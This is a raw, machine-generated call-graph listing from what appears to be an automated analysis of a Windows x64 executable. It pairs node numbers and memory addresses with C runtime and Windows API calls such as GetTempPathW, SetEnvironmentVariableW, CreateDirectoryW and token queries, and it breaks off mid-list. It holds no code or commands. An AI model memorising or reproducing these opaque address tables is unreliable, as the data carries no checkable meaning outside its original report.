7ff6dd66aa49 15995->15996 15997 7ff6dd66aa53 15995->15997 15996->15997 16002 7ff6dd66aa6e 15996->16002 15998 7ff6dd6654c4 _findclose 11 API calls 15997->15998 15999 7ff6dd66aa5a 15998->15999 16000 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 15999->16000 16001 7ff6dd66aa66 16000->16001 16001->15970 16001->15986 16002->16001 16003 7ff6dd6654c4 _findclose 11 API calls 16002->16003 16003->15999 16037 7ff6dd67471c 16004->16037 16008 7ff6dd66e96c 16009 7ff6dd66e970 16008->16009 16010 7ff6dd66e9c1 16008->16010 16011 7ff6dd66e98c 16008->16011 16009->15970 16090 7ff6dd66e4b0 16010->16090 16086 7ff6dd66e76c 16011->16086 16015 7ff6dd67471c 38 API calls 16014->16015 16016 7ff6dd66e6de 16015->16016 16017 7ff6dd674164 37 API calls 16016->16017 16018 7ff6dd66e72e 16017->16018 16019 7ff6dd66e732 16018->16019 16020 7ff6dd66e76c 45 API calls 16018->16020 16019->15970 16020->16019 16022 7ff6dd67471c 38 API calls 16021->16022 16023 7ff6dd66e3ff 16022->16023 16024 7ff6dd674164 37 API calls 16023->16024 16025 7ff6dd66e457 16024->16025 16026 7ff6dd66e45b 16025->16026 16027 7ff6dd66e4b0 45 API calls 16025->16027 16026->15970 16027->16026 16029 7ff6dd66e094 16028->16029 16030 7ff6dd66e061 16028->16030 16032 7ff6dd66e0ac 16029->16032 16035 7ff6dd66e12d 16029->16035 16031 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16030->16031 16034 7ff6dd66e08d memcpy_s 16031->16034 16033 7ff6dd66e3b4 46 API calls 16032->16033 16033->16034 16034->15970 16035->16034 16036 7ff6dd664900 45 API calls 16035->16036 16036->16034 16038 7ff6dd67476f fegetenv 16037->16038 16039 7ff6dd67867c 37 API calls 16038->16039 16043 7ff6dd6747c2 16039->16043 16040 7ff6dd6747ef 16045 7ff6dd66aa3c __std_exception_copy 37 API calls 16040->16045 16041 7ff6dd6748b2 16042 7ff6dd67867c 37 API calls 16041->16042 16044 7ff6dd6748dc 16042->16044 16043->16041 16046 7ff6dd67488c 16043->16046 16047 7ff6dd6747dd 16043->16047 16048 7ff6dd67867c 37 API calls 16044->16048 16049 7ff6dd67486d 16045->16049 16052 7ff6dd66aa3c __std_exception_copy 37 API calls 16046->16052 16047->16040 16047->16041 16050 7ff6dd6748ed 16048->16050 16051 7ff6dd675994 16049->16051 16056 7ff6dd674875 16049->16056 16053 7ff6dd678870 20 API calls 16050->16053 16054 7ff6dd66aec4 _wfindfirst32i64 17 API calls 16051->16054 16052->16049 16064 7ff6dd674956 memcpy_s 16053->16064 16055 7ff6dd6759a9 16054->16055 16057 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16056->16057 16058 7ff6dd66e911 16057->16058 16082 7ff6dd674164 16058->16082 16059 7ff6dd674cff memcpy_s 16060 7ff6dd67503f 16061 7ff6dd674280 37 API calls 16060->16061 16068 7ff6dd675757 16061->16068 16062 7ff6dd674feb 16062->16060 16065 7ff6dd6759ac memcpy_s 37 API calls 16062->16065 16063 7ff6dd674997 memcpy_s 16076 7ff6dd6752db memcpy_s 16063->16076 16078 7ff6dd674df3 memcpy_s 16063->16078 16064->16059 16064->16063 16066 7ff6dd6654c4 _findclose 11 API calls 16064->16066 16065->16060 16067 7ff6dd674dd0 16066->16067 16069 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16067->16069 16070 7ff6dd6759ac memcpy_s 37 API calls 16068->16070 16080 7ff6dd6757b2 16068->16080 16069->16063 16070->16080 16071 7ff6dd675938 16072 7ff6dd67867c 37 API calls 16071->16072 16072->16056 16073 7ff6dd6654c4 11 API calls _findclose 16073->16076 16074 7ff6dd6654c4 11 API calls _findclose 16074->16078 16075 7ff6dd66aea4 37 API calls _invalid_parameter_noinfo 16075->16078 16076->16060 16076->16062 16076->16073 16081 7ff6dd66aea4 37 API calls _invalid_parameter_noinfo 16076->16081 16077 7ff6dd674280 37 API calls 16077->16080 16078->16062 16078->16074 16078->16075 16079 7ff6dd6759ac memcpy_s 37 API calls 16079->16080 16080->16071 16080->16077 16080->16079 16081->16076 16083 7ff6dd674183 16082->16083 16084 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16083->16084 16085 7ff6dd6741ae memcpy_s 16083->16085 16084->16085 16085->16008 16087 7ff6dd66e798 memcpy_s 16086->16087 16088 7ff6dd664900 45 API calls 16087->16088 16089 7ff6dd66e852 memcpy_s 16087->16089 16088->16089 16089->16009 16091 7ff6dd66e4eb 16090->16091 16092 7ff6dd66e538 memcpy_s 16090->16092 16093 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16091->16093 16095 7ff6dd66e5a3 16092->16095 16097 7ff6dd664900 45 API calls 16092->16097 16094 7ff6dd66e517 16093->16094 16094->16009 16096 7ff6dd66aa3c __std_exception_copy 37 API calls 16095->16096 16100 7ff6dd66e5e5 memcpy_s 16096->16100 16097->16095 16098 7ff6dd66aec4 _wfindfirst32i64 17 API calls 16099 7ff6dd66e690 16098->16099 16100->16098 16103 7ff6dd6704ec WideCharToMultiByte 16101->16103 16105 7ff6dd660e93 16104->16105 16106 7ff6dd660e81 16104->16106 16108 7ff6dd660ea0 16105->16108 16112 7ff6dd660edd 16105->16112 16107 7ff6dd6654c4 _findclose 11 API calls 16106->16107 16109 7ff6dd660e86 16107->16109 16111 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16108->16111 16110 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16109->16110 16116 7ff6dd660e91 16110->16116 16111->16116 16113 7ff6dd660f86 16112->16113 16114 7ff6dd6654c4 _findclose 11 API calls 16112->16114 16115 7ff6dd6654c4 _findclose 11 API calls 16113->16115 16113->16116 16117 7ff6dd660f7b 16114->16117 16118 7ff6dd661030 16115->16118 16116->15840 16119 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16117->16119 16120 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16118->16120 16119->16113 16120->16116 16122 7ff6dd66df91 16121->16122 16124 7ff6dd66493f 16121->16124 16122->16124 16129 7ff6dd673974 16122->16129 16125 7ff6dd66dfe4 16124->16125 16126 7ff6dd66494f 16125->16126 16127 7ff6dd66dffd 16125->16127 16126->15840 16127->16126 16173 7ff6dd672cc0 16127->16173 16141 7ff6dd66b710 GetLastError 16129->16141 16132 7ff6dd6739ce 16132->16124 16142 7ff6dd66b734 FlsGetValue 16141->16142 16143 7ff6dd66b751 FlsSetValue 16141->16143 16144 7ff6dd66b74b 16142->16144 16160 7ff6dd66b741 16142->16160 16145 7ff6dd66b763 16143->16145 16143->16160 16144->16143 16147 7ff6dd66f158 _findclose 11 API calls 16145->16147 16146 7ff6dd66b7bd SetLastError 16148 7ff6dd66b7dd 16146->16148 16149 7ff6dd66b7ca 16146->16149 16150 7ff6dd66b772 16147->16150 16164 7ff6dd66aa9c 16148->16164 16149->16132 16163 7ff6dd670cb8 EnterCriticalSection 16149->16163 16152 7ff6dd66b790 FlsSetValue 16150->16152 16153 7ff6dd66b780 FlsSetValue 16150->16153 16155 7ff6dd66b79c FlsSetValue 16152->16155 16156 7ff6dd66b7ae 16152->16156 16154 7ff6dd66b789 16153->16154 16158 7ff6dd66af0c __free_lconv_num 11 API calls 16154->16158 16155->16154 16159 7ff6dd66b4b8 _findclose 11 API calls 16156->16159 16158->16160 16161 7ff6dd66b7b6 16159->16161 16160->16146 16162 7ff6dd66af0c __free_lconv_num 11 API calls 16161->16162 16162->16146 16165 7ff6dd673cc0 __CxxCallCatchBlock EnterCriticalSection LeaveCriticalSection 16164->16165 16166 7ff6dd66aaa5 16165->16166 16167 7ff6dd66aab4 16166->16167 16168 7ff6dd673d10 __CxxCallCatchBlock 44 API calls 16166->16168 16169 7ff6dd66aabd IsProcessorFeaturePresent 16167->16169 16170 7ff6dd66aae7 __CxxCallCatchBlock 16167->16170 16168->16167 16171 7ff6dd66aacc 16169->16171 16172 7ff6dd66abd8 _wfindfirst32i64 14 API calls 16171->16172 16172->16170 16174 7ff6dd66b710 __CxxCallCatchBlock 45 API calls 16173->16174 16175 7ff6dd672cc9 16174->16175 16183 7ff6dd66536c EnterCriticalSection 16176->16183 16185 7ff6dd6528ac 16184->16185 16186 7ff6dd664ac4 49 API calls 16185->16186 16187 7ff6dd6528fd 16186->16187 16188 7ff6dd6654c4 _findclose 11 API calls 16187->16188 16189 7ff6dd652902 16188->16189 16203 7ff6dd6654e4 16189->16203 16192 7ff6dd651ef0 49 API calls 16193 7ff6dd652931 memcpy_s 16192->16193 16194 7ff6dd658ae0 57 API calls 16193->16194 16195 7ff6dd652966 16194->16195 16196 7ff6dd65296b 16195->16196 16197 7ff6dd6529a3 MessageBoxA 16195->16197 16198 7ff6dd658ae0 57 API calls 16196->16198 16199 7ff6dd6529bd 16197->16199 16200 7ff6dd652985 MessageBoxW 16198->16200 16201 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16199->16201 16200->16199 16202 7ff6dd6529cd 16201->16202 16202->15526 16204 7ff6dd66b888 _findclose 11 API calls 16203->16204 16205 7ff6dd6654fb 16204->16205 16206 7ff6dd66f158 _findclose 11 API calls 16205->16206 16208 7ff6dd66553b 16205->16208 16212 7ff6dd652909 16205->16212 16207 7ff6dd665530 16206->16207 16209 7ff6dd66af0c __free_lconv_num 11 API calls 16207->16209 16208->16212 16215 7ff6dd66f828 16208->16215 16209->16208 16212->16192 16213 7ff6dd66aec4 _wfindfirst32i64 17 API calls 16214 7ff6dd665580 16213->16214 16216 7ff6dd66f845 16215->16216 16219 7ff6dd665561 16216->16219 16220 7ff6dd66f84a 16216->16220 16222 7ff6dd66f894 16216->16222 16217 7ff6dd6654c4 _findclose 11 API calls 16218 7ff6dd66f854 16217->16218 16221 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16218->16221 16219->16212 16219->16213 16220->16217 16220->16219 16221->16219 16222->16219 16223 7ff6dd6654c4 _findclose 11 API calls 16222->16223 16223->16218 16225 7ff6dd658c82 WideCharToMultiByte 16224->16225 16226 7ff6dd658c14 WideCharToMultiByte 16224->16226 16229 7ff6dd653f25 16225->16229 16230 7ff6dd658caf 16225->16230 16227 7ff6dd658c55 16226->16227 16228 7ff6dd658c3e 16226->16228 16227->16225 16233 7ff6dd658c6b 16227->16233 16231 7ff6dd6529e0 57 API calls 16228->16231 16229->15536 16229->15537 16232 7ff6dd6529e0 57 API calls 16230->16232 16231->16229 16232->16229 16234 7ff6dd6529e0 57 API calls 16233->16234 16234->16229 16236 7ff6dd66a9b3 16235->16236 16239 7ff6dd657bde 16235->16239 16237 7ff6dd66aa3c __std_exception_copy 37 API calls 16236->16237 16236->16239 16238 7ff6dd66a9e0 16237->16238 16238->16239 16240 7ff6dd66aec4 _wfindfirst32i64 17 API calls 16238->16240 16239->15553 16241 7ff6dd66aa10 16240->16241 16243 7ff6dd653fd0 116 API calls 16242->16243 16244 7ff6dd651ad6 16243->16244 16245 7ff6dd651c84 16244->16245 16247 7ff6dd6582b0 83 API calls 16244->16247 16246 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16245->16246 16248 7ff6dd651c98 16246->16248 16249 7ff6dd651b0e 16247->16249 16248->15572 16275 7ff6dd653e40 16248->16275 16274 7ff6dd651b3f 16249->16274 16281 7ff6dd660814 16249->16281 16251 7ff6dd66018c 74 API calls 16251->16245 16252 7ff6dd651b28 16253 7ff6dd651b2c 16252->16253 16254 7ff6dd651b44 16252->16254 16256 7ff6dd652890 59 API calls 16253->16256 16285 7ff6dd6604dc 16254->16285 16256->16274 16258 7ff6dd651b77 16261 7ff6dd660814 73 API calls 16258->16261 16259 7ff6dd651b5f 16260 7ff6dd652890 59 API calls 16259->16260 16260->16274 16262 7ff6dd651bc4 16261->16262 16263 7ff6dd651bd6 16262->16263 16264 7ff6dd651bee 16262->16264 16265 7ff6dd652890 59 API calls 16263->16265 16266 7ff6dd6604dc _fread_nolock 53 API calls 16264->16266 16265->16274 16267 7ff6dd651c03 16266->16267 16268 7ff6dd651c09 16267->16268 16269 7ff6dd651c1e 16267->16269 16270 7ff6dd652890 59 API calls 16268->16270 16288 7ff6dd660250 16269->16288 16270->16274 16274->16251 16276 7ff6dd651ef0 49 API calls 16275->16276 16277 7ff6dd653e5d 16276->16277 16277->15573 16279 7ff6dd651ef0 49 API calls 16278->16279 16280 7ff6dd654080 16279->16280 16280->15572 16282 7ff6dd660844 16281->16282 16294 7ff6dd6605a4 16282->16294 16284 7ff6dd66085d 16284->16252 16306 7ff6dd6604fc 16285->16306 16295 7ff6dd66060e 16294->16295 16296 7ff6dd6605ce 16294->16296 16295->16296 16298 7ff6dd66061a 16295->16298 16297 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16296->16297 16299 7ff6dd6605f5 16297->16299 16305 7ff6dd66536c EnterCriticalSection 16298->16305 16299->16284 16307 7ff6dd660526 16306->16307 16318 7ff6dd651b59 16306->16318 16308 7ff6dd660572 16307->16308 16309 7ff6dd660535 memcpy_s 16307->16309 16307->16318 16319 7ff6dd66536c EnterCriticalSection 16308->16319 16311 7ff6dd6654c4 _findclose 11 API calls 16309->16311 16313 7ff6dd66054a 16311->16313 16315 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16313->16315 16315->16318 16318->16258 16318->16259 16321 7ff6dd657966 16320->16321 16322 7ff6dd65798a 16321->16322 16323 7ff6dd6579dd GetTempPathW 16321->16323 16325 7ff6dd657b60 61 API calls 16322->16325 16324 7ff6dd6579f2 16323->16324 16359 7ff6dd652830 16324->16359 16326 7ff6dd657996 16325->16326 16383 7ff6dd657420 16326->16383 16332 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16334 7ff6dd65154f 16332->16334 16333 7ff6dd6579bc __vcrt_freefls 16333->16323 16334->15580 16334->15583 16336 7ff6dd657ab6 16339 7ff6dd658bf0 59 API calls 16336->16339 16337 7ff6dd657a0b __vcrt_freefls 16337->16336 16343 7ff6dd657a41 16337->16343 16363 7ff6dd668aa4 16337->16363 16366 7ff6dd658950 16337->16366 16342 7ff6dd657ac7 __vcrt_freefls 16339->16342 16346 7ff6dd658ae0 57 API calls 16342->16346 16358 7ff6dd657a7a __vcrt_freefls 16342->16358 16344 7ff6dd658ae0 57 API calls 16343->16344 16343->16358 16345 7ff6dd657a57 16344->16345 16347 7ff6dd657a5c 16345->16347 16348 7ff6dd657a99 SetEnvironmentVariableW 16345->16348 16349 7ff6dd657ae5 16346->16349 16350 7ff6dd658ae0 57 API calls 16347->16350 16348->16358 16351 7ff6dd657aea 16349->16351 16352 7ff6dd657b1d SetEnvironmentVariableW 16349->16352 16353 7ff6dd657a6c 16350->16353 16354 7ff6dd658ae0 57 API calls 16351->16354 16352->16358 16355 7ff6dd667dec 38 API calls 16353->16355 16355->16358 16358->16332 16360 7ff6dd652855 16359->16360 16417 7ff6dd664d18 16360->16417 16611 7ff6dd6686d0 16363->16611 16367 7ff6dd65bc60 16366->16367 16368 7ff6dd658960 GetCurrentProcess OpenProcessToken 16367->16368 16369 7ff6dd6589ab GetTokenInformation 16368->16369 16370 7ff6dd658a21 __vcrt_freefls 16368->16370 16371 7ff6dd6589cd GetLastError 16369->16371 16372 7ff6dd6589d8 16369->16372 16373 7ff6dd658a3a 16370->16373 16374 7ff6dd658a34 FindCloseChangeNotification 16370->16374 16371->16370 16371->16372 16372->16370 16375 7ff6dd6589ee GetTokenInformation 16372->16375 16742 7ff6dd658650 16373->16742 16374->16373 16375->16370 16377 7ff6dd658a14 ConvertSidToStringSidW 16375->16377 16377->16370 16384 7ff6dd65742c 16383->16384 16385 7ff6dd658ae0 57 API calls 16384->16385 16386 7ff6dd65744e 16385->16386 16387 7ff6dd657456 16386->16387 16388 7ff6dd657469 ExpandEnvironmentStringsW 16386->16388 16389 7ff6dd652b30 59 API calls 16387->16389 16390 7ff6dd65748f __vcrt_freefls 16388->16390 16396 7ff6dd657462 16389->16396 16391 7ff6dd6574a6 16390->16391 16392 7ff6dd657493 16390->16392 16397 7ff6dd6574b4 16391->16397 16398 7ff6dd6574c0 16391->16398 16394 7ff6dd652b30 59 API calls 16392->16394 16393 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16395 7ff6dd657588 16393->16395 16394->16396 16395->16358 16407 7ff6dd667dec 16395->16407 16396->16393 16746 7ff6dd6679a4 16397->16746 16753 7ff6dd666328 16398->16753 16401 7ff6dd6574be 16402 7ff6dd6574da 16401->16402 16403 7ff6dd6574ed memcpy_s 16401->16403 16404 7ff6dd652b30 59 API calls 16402->16404 16405 7ff6dd657562 CreateDirectoryW 16403->16405 16406 7ff6dd65753c CreateDirectoryW 16403->16406 16404->16396 16405->16396 16406->16403 16408 7ff6dd667e0c 16407->16408 16409 7ff6dd667df9 16407->16409 16854 7ff6dd667a70 16408->16854 16410 7ff6dd6654c4 _findclose 11 API calls 16409->16410 16412 7ff6dd667dfe 16410->16412 16414 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16412->16414 16416 7ff6dd667e0a 16414->16416 16416->16333 16418 7ff6dd664d72 16417->16418 16419 7ff6dd664d97 16418->16419 16420 7ff6dd664dd3 16418->16420 16421 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16419->16421 16435 7ff6dd6630d0 16420->16435 16423 7ff6dd664dc1 16421->16423 16425 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16423->16425 16424 7ff6dd664eb4 16426 7ff6dd66af0c __free_lconv_num 11 API calls 16424->16426 16428 7ff6dd652874 16425->16428 16426->16423 16428->16337 16429 7ff6dd664eda 16429->16424 16431 7ff6dd664ee4 16429->16431 16430 7ff6dd664e89 16432 7ff6dd66af0c __free_lconv_num 11 API calls 16430->16432 16434 7ff6dd66af0c __free_lconv_num 11 API calls 16431->16434 16432->16423 16433 7ff6dd664e80 16433->16424 16433->16430 16434->16423 16436 7ff6dd66310e 16435->16436 16437 7ff6dd6630fe 16435->16437 16438 7ff6dd663117 16436->16438 16443 7ff6dd663145 16436->16443 16440 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16437->16440 16441 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16438->16441 16439 7ff6dd66313d 16439->16424 16439->16429 16439->16430 16439->16433 16440->16439 16441->16439 16443->16437 16443->16439 16446 7ff6dd663ae4 16443->16446 16479 7ff6dd663530 16443->16479 16516 7ff6dd662cc0 16443->16516 16447 7ff6dd663b97 16446->16447 16448 7ff6dd663b26 16446->16448 16449 7ff6dd663b9c 16447->16449 16450 7ff6dd663bf0 16447->16450 16451 7ff6dd663b2c 16448->16451 16452 7ff6dd663bc1 16448->16452 16453 7ff6dd663b9e 16449->16453 16454 7ff6dd663bd1 16449->16454 16458 7ff6dd663bfa 16450->16458 16459 7ff6dd663c07 16450->16459 16464 7ff6dd663bff 16450->16464 16455 7ff6dd663b31 16451->16455 16456 7ff6dd663b60 16451->16456 16535 7ff6dd661e94 16452->16535 16457 7ff6dd663b40 16453->16457 16466 7ff6dd663bad 16453->16466 16542 7ff6dd661a84 16454->16542 16455->16459 16461 7ff6dd663b37 16455->16461 16456->16461 16456->16464 16477 7ff6dd663c30 16457->16477 16519 7ff6dd664298 16457->16519 16458->16452 16458->16464 16549 7ff6dd6647ec 16459->16549 16461->16457 16467 7ff6dd663b72 16461->16467 16474 7ff6dd663b5b 16461->16474 16464->16477 16553 7ff6dd6622a4 16464->16553 16466->16452 16469 7ff6dd663bb2 16466->16469 16467->16477 16529 7ff6dd6645d4 16467->16529 16472 7ff6dd664698 37 API calls 16469->16472 16469->16477 16471 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16473 7ff6dd663f2a 16471->16473 16472->16474 16473->16443 16475 7ff6dd664900 45 API calls 16474->16475 16474->16477 16478 7ff6dd663e1c 16474->16478 16475->16478 16477->16471 16478->16477 16560 7ff6dd66efc8 16478->16560 16480 7ff6dd663554 16479->16480 16481 7ff6dd66353e 16479->16481 16482 7ff6dd663594 16480->16482 16485 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16480->16485 16481->16482 16483 7ff6dd663b97 16481->16483 16484 7ff6dd663b26 16481->16484 16482->16443 16486 7ff6dd663b9c 16483->16486 16487 7ff6dd663bf0 16483->16487 16488 7ff6dd663b2c 16484->16488 16489 7ff6dd663bc1 16484->16489 16485->16482 16490 7ff6dd663b9e 16486->16490 16491 7ff6dd663bd1 16486->16491 16495 7ff6dd663bfa 16487->16495 16496 7ff6dd663c07 16487->16496 16501 7ff6dd663bff 16487->16501 16492 7ff6dd663b31 16488->16492 16493 7ff6dd663b60 16488->16493 16497 7ff6dd661e94 38 API calls 16489->16497 16494 7ff6dd663b40 16490->16494 16505 7ff6dd663bad 16490->16505 16499 7ff6dd661a84 38 API calls 16491->16499 16492->16496 16498 7ff6dd663b37 16492->16498 16493->16498 16493->16501 16500 7ff6dd664298 47 API calls 16494->16500 16515 7ff6dd663c30 16494->16515 16495->16489 16495->16501 16502 7ff6dd6647ec 45 API calls 16496->16502 16513 7ff6dd663b5b 16497->16513 16498->16494 16503 7ff6dd663b72 16498->16503 16498->16513 16499->16513 16500->16513 16504 7ff6dd6622a4 38 API calls 16501->16504 16501->16515 16502->16513 16506 7ff6dd6645d4 46 API calls 16503->16506 16503->16515 16504->16513 16505->16489 16507 7ff6dd663bb2 16505->16507 16506->16513 16509 7ff6dd664698 37 API calls 16507->16509 16507->16515 16508 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16510 7ff6dd663f2a 16508->16510 16509->16513 16510->16443 16511 7ff6dd664900 45 API calls 16514 7ff6dd663e1c 16511->16514 16512 7ff6dd66efc8 46 API calls 16512->16514 16513->16511 16513->16514 16513->16515 16514->16512 16514->16515 16515->16508 16594 7ff6dd661108 16516->16594 16520 7ff6dd6642be 16519->16520 16521 7ff6dd660cc0 12 API calls 16520->16521 16522 7ff6dd66430e 16521->16522 16523 7ff6dd66eb30 46 API calls 16522->16523 16532 7ff6dd664609 16529->16532 16530 7ff6dd66464e 16530->16474 16531 7ff6dd664627 16534 7ff6dd66efc8 46 API calls 16531->16534 16532->16530 16532->16531 16533 7ff6dd664900 45 API calls 16532->16533 16533->16531 16534->16530 16536 7ff6dd661ec7 16535->16536 16537 7ff6dd661ef6 16536->16537 16539 7ff6dd661fb3 16536->16539 16541 7ff6dd661f33 16537->16541 16572 7ff6dd660d68 16537->16572 16540 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16539->16540 16540->16541 16541->16474 16543 7ff6dd661ab7 16542->16543 16544 7ff6dd661ae6 16543->16544 16546 7ff6dd661ba3 16543->16546 16545 7ff6dd660d68 12 API calls 16544->16545 16547 7ff6dd661b23 16544->16547 16545->16547 16548 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16546->16548 16547->16474 16548->16547 16550 7ff6dd66482f 16549->16550 16552 7ff6dd664833 __crtLCMapStringW 16550->16552 16580 7ff6dd664888 16550->16580 16552->16474 16554 7ff6dd6622d7 16553->16554 16555 7ff6dd662306 16554->16555 16557 7ff6dd6623c3 16554->16557 16556 7ff6dd660d68 12 API calls 16555->16556 16559 7ff6dd662343 16555->16559 16556->16559 16558 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16557->16558 16558->16559 16559->16474 16562 7ff6dd66eff9 16560->16562 16569 7ff6dd66f007 16560->16569 16562->16569 16569->16478 16573 7ff6dd660d9f 16572->16573 16579 7ff6dd660d8e 16572->16579 16574 7ff6dd66dbbc _fread_nolock 12 API calls 16573->16574 16573->16579 16579->16541 16581 7ff6dd6648a6 16580->16581 16582 7ff6dd6648ae 16580->16582 16583 7ff6dd664900 45 API calls 16581->16583 16582->16552 16583->16582 16595 7ff6dd66113d 16594->16595 16596 7ff6dd66114f 16594->16596 16597 7ff6dd6654c4 _findclose 11 API calls 16595->16597 16599 7ff6dd66115d 16596->16599 16602 7ff6dd661199 16596->16602 16598 7ff6dd661142 16597->16598 16600 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16598->16600 16601 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16599->16601 16604 7ff6dd66114d 16600->16604 16601->16604 16603 7ff6dd661515 16602->16603 16606 7ff6dd6654c4 _findclose 11 API calls 16602->16606 16603->16604 16605 7ff6dd6654c4 _findclose 11 API calls 16603->16605 16604->16443 16607 7ff6dd6617a9 16605->16607 16608 7ff6dd66150a 16606->16608 16609 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16607->16609 16610 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16608->16610 16609->16604 16610->16603 16652 7ff6dd671bc8 16611->16652 16711 7ff6dd671940 16652->16711 16732 7ff6dd670cb8 EnterCriticalSection 16711->16732 16743 7ff6dd658675 16742->16743 16747 7ff6dd6679f5 16746->16747 16748 7ff6dd6679c2 16746->16748 16747->16401 16748->16747 16765 7ff6dd670e54 16748->16765 16751 7ff6dd66aec4 _wfindfirst32i64 17 API calls 16752 7ff6dd667a25 16751->16752 16754 7ff6dd6663b2 16753->16754 16755 7ff6dd666344 16753->16755 16799 7ff6dd6704a0 16754->16799 16755->16754 16757 7ff6dd666349 16755->16757 16758 7ff6dd66637e 16757->16758 16759 7ff6dd666361 16757->16759 16782 7ff6dd66616c GetFullPathNameW 16758->16782 16774 7ff6dd6660f8 GetFullPathNameW 16759->16774 16764 7ff6dd666376 __vcrt_freefls 16764->16401 16766 7ff6dd670e61 16765->16766 16768 7ff6dd670e6b 16765->16768 16766->16768 16772 7ff6dd670e87 16766->16772 16767 7ff6dd6654c4 _findclose 11 API calls 16769 7ff6dd670e73 16767->16769 16768->16767 16770 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16769->16770 16771 7ff6dd6679f1 16770->16771 16771->16747 16771->16751 16772->16771 16773 7ff6dd6654c4 _findclose 11 API calls 16772->16773 16773->16769 16775 7ff6dd66611e GetLastError 16774->16775 16778 7ff6dd666134 16774->16778 16776 7ff6dd665438 _fread_nolock 11 API calls 16775->16776 16779 7ff6dd66612b 16776->16779 16777 7ff6dd666130 16777->16764 16778->16777 16780 7ff6dd6654c4 _findclose 11 API calls 16778->16780 16781 7ff6dd6654c4 _findclose 11 API calls 16779->16781 16780->16777 16781->16777 16783 7ff6dd66619f GetLastError 16782->16783 16788 7ff6dd6661b5 __vcrt_freefls 16782->16788 16784 7ff6dd665438 _fread_nolock 11 API calls 16783->16784 16785 7ff6dd6661ac 16784->16785 16786 7ff6dd6654c4 _findclose 11 API calls 16785->16786 16787 7ff6dd6661b1 16786->16787 16790 7ff6dd666244 16787->16790 16788->16787 16789 7ff6dd66620f GetFullPathNameW 16788->16789 16789->16783 16789->16787 16791 7ff6dd66626d memcpy_s 16790->16791 16792 7ff6dd6662b8 memcpy_s 16790->16792 16791->16792 16792->16764 16802 7ff6dd6702b0 16799->16802 16803 7ff6dd6702db 16802->16803 16804 7ff6dd6702f2 16802->16804 16805 7ff6dd6654c4 _findclose 11 API calls 16803->16805 16806 7ff6dd6702f6 16804->16806 16807 7ff6dd670317 16804->16807 16809 7ff6dd6702e0 16805->16809 16828 7ff6dd67041c 16806->16828 16840 7ff6dd66f918 16807->16840 16813 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16809->16813 16829 7ff6dd670466 16828->16829 16830 7ff6dd670436 16828->16830 16841 7ff6dd65d0e0 memcpy_s 16840->16841 16861 7ff6dd670cb8 EnterCriticalSection 16854->16861 16863 7ff6dd651726 16862->16863 16864 7ff6dd65173e 16862->16864 16865 7ff6dd652b30 59 API calls 16863->16865 16866 7ff6dd651768 16864->16866 16867 7ff6dd651744 16864->16867 16868 7ff6dd651732 16865->16868 16955 7ff6dd657c10 16866->16955 16994 7ff6dd6512b0 16867->16994 16868->15608 16873 7ff6dd65175f 16873->15608 16874 7ff6dd65178d 16878 7ff6dd652890 59 API calls 16874->16878 16875 7ff6dd6517b9 16876 7ff6dd653fd0 116 API calls 16875->16876 16879 7ff6dd6517ce 16876->16879 16877 7ff6dd652b30 59 API calls 16877->16873 16880 7ff6dd6517a3 16878->16880 16881 7ff6dd6517d6 16879->16881 16882 7ff6dd6517ee 16879->16882 16880->15608 16905 7ff6dd652d86 16904->16905 16906 7ff6dd651ef0 49 API calls 16905->16906 16907 7ff6dd652db9 16906->16907 16908 7ff6dd653e40 49 API calls 16907->16908 16954 7ff6dd6530ea 16907->16954 16909 7ff6dd652e27 16908->16909 16910 7ff6dd653e40 49 API calls 16909->16910 16911 7ff6dd652e38 16910->16911 16912 7ff6dd652e59 16911->16912 16913 7ff6dd652e95 16911->16913 17133 7ff6dd6531b0 16912->17133 16915 7ff6dd6531b0 75 API calls 16913->16915 16916 7ff6dd652e93 16915->16916 16917 7ff6dd652f16 16916->16917 16918 7ff6dd652ed4 16916->16918 16920 7ff6dd6531b0 75 API calls 16917->16920 17141 7ff6dd6575a0 16918->17141 16922 7ff6dd652f40 16920->16922 16956 7ff6dd657c20 16955->16956 16957 7ff6dd651ef0 49 API calls 16956->16957 16958 7ff6dd657c61 16957->16958 16972 7ff6dd657ce1 16958->16972 17037 7ff6dd653f60 16958->17037 16960 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16962 7ff6dd651785 16960->16962 16962->16874 16962->16875 16963 7ff6dd657d1b 16965 7ff6dd657b60 61 API calls 16973 7ff6dd657c92 __vcrt_freefls 16965->16973 16972->16960 16995 7ff6dd6512c2 16994->16995 16996 7ff6dd653fd0 116 API calls 16995->16996 16997 7ff6dd6512f2 16996->16997 16998 7ff6dd6512fa 16997->16998 16999 7ff6dd651311 16997->16999 17000 7ff6dd652b30 59 API calls 16998->17000 17001 7ff6dd660814 73 API calls 16999->17001 17030 